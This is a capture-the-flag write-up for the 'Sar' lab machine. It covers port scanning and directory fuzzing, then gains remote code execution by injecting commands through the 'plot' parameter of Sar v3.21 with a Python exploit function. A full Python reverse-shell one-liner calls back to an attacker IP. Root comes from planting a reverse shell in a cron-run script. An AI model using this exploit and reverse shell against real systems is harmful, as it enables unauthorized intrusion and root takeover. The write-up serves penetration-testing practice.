Proving grounds Play - Sar CTF writeup.
NMAP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3340be13cf517dd6a59c64c813e5f29f (RSA)
| 256 8a4eab0bdee3694050989858328f719e (ECDSA)
|_ 256 e62f551cdbd0bb469280dd5f8ea30a41 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Fuzzing for Directories and Files
000000069: 200 375 L 964 W 10918 Ch "index.html"
000000157: 403 9 L 28 W 279 Ch ".htaccess"
000000248: 200 1 L 1 W 9 Ch "robots.txt"
000000279: 200 1172 L 5873 W 95674 Ch "phpinfo.php"
Sar v3.21
Searchsploit
Remote Code Execution
As per the exploit code the param plot
is vulnerable to remote code execution.
def exploiter(cmd):
global url
sess = requests.session()
output = sess.get(f"{url}/index.php?plot=;{cmd}") #vulnerable
try:
out = re.findall("<option value=(.*?)>", output.text)
except:
print ("Error!!")
for ouut in out:
if "There is no defined host..." not in ouut:
if "null selected" not in ouut:
if "selected" not in ouut:
print (ouut)
print ()
Python Reverse Shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.151",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
Reverse Shell Obtained
Privilege Escalation
Crontab running a cron job every 5 minutes.
Listing permissions for the script file.
Script contents
Finally.sh
#!/bin/sh
./write.sh
write.sh
#!/bin/sh
touch /tmp/gateway
Added python revershell to the write.sh
file, so when the cronjob runs the write.sh file it will runs as root
.
Root Obtained
Thanks for reading!
For more updates and insights, follow me on Twitter: @thevillagehacker.